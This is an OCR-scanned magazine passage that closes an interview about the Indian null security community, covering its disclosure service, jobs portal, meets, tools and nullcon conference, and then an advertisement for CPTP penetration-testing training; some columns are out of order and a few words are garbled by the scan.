searchers who find it difficult to report and get the 
vulnerability fixed, report it to us and we take on 
the responsibility of reporting it to vendor and get- 
ting it fixed. There is no restriction on the type of 
vulnerability one can report i.e. even vulnerabilities 
in custom websites can be reported to Keeda. For 
more details you can visit http://keeda.null.co.in. 

Null Jobs 

A free portal for posting and applying for security 
jobs. We have been running the portal for more 
than a year now and have received hundreds of 
job postings and applications. Many people have 
found the right jobs through the portal. We have 
changed the way how security job openings were 
communicated in the past by way of having a cen- 



nlueoM 



meets. There are generally presentations by mem- 
bers and discussions on hot topics in security. The 
chapters run independently with all the information 
being collated on our community portal http://null. 
co. in It is amazing to see the kind of deep tech- 
nical knowledge talks and information exchange 
happening at the null meets. The meets are free 
for everyone i.e. no registration and as we at say 
at null - just come with an open mind. People in- 
terested in opening local null chapters can directly 
contact us and we can assist them with the same. 

ED: Do you work on any projects in null? 

AJ: We have several projects running. All projects 
are run by null members who have volunteered 
and taken some time out of their busy schedule to 
manage those projects. 

Software projects 

There are various open source security software 
written and contributed by null members. The de- 
tails can be found at - http://null.co.in/section/ 
atheneum/projects/ Some of the noted projects 
include Game|Over - The web security learning 
platform, Jugaad - Linux remote thread injection 
kit, Wireplay - server communication fuzzing tool, 
Malware analyser and many more. 



tralized portal for most of the security jobs in India. 
We plan to take it international in sometime and 
assist the international community for the same. 
Details can be found at http://jobs.nullcon.net. 

null HumlAJ 

Humla literally means attack in hindi. An offensive 
hands-on informal workshop and gathering. This 
happens in most of the null chapters. It is a day long 
session on any offensive technology picked up by 
the volunteers. We have a Humla champion who 
runs the show. The session is totally free, however 
to maintain the quality we keep limited registrations. 

ED: Any message for our readers? 

AJ: I request you to come out of your office space 
and contribute to the community as much as you 
can. Believe me when I say that the best way to 
learn is to share and network with the community. 

Take some time out of your busy schedule and 
come down for nullcon. We promise an experience 
never experienced :). We have special packages 
for international delegates. 

And as they say for nullcon - Beware! Be There! 
Get ready to Goa! 

ED: Thank you very much! Good luck! 
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Hack uetense 

Emerging leader in Information Security Training & Services 

Learn The Most Advance Ethical Hacking Training - CPTP 

The CPTP certification is quickly becoming accepted worldwide as one of the 
most prestigious Information Security certification in the industry. Information 
Security Professionals holding an active CPTP certification are recognized for 
their expert-level knowledge and skills in hard core penetration testing. The deep 
technical penetration testingknowledge that a CPTP brings ensures that they are 
well qualified to address the most technically challenging cyber security threats 
and security vulnerabilities to Corporate Infrastructure. 
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DECEMBER 1-5, 2012 

AMSTERDAM 

APRIL 22-26,2013 
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JANUARY 14-18, 2013 

NEW YORK 

JULY 1-5,2013 



For more CPTP Boot camp Location's 
visit - www.hackdefense.org 



Corporate Training's/Enquiries 
email - contact@hackdefense.org 



Hack Defense, brand name in Delivering high end penetration testing training to top Fortune 500 MNC's. 



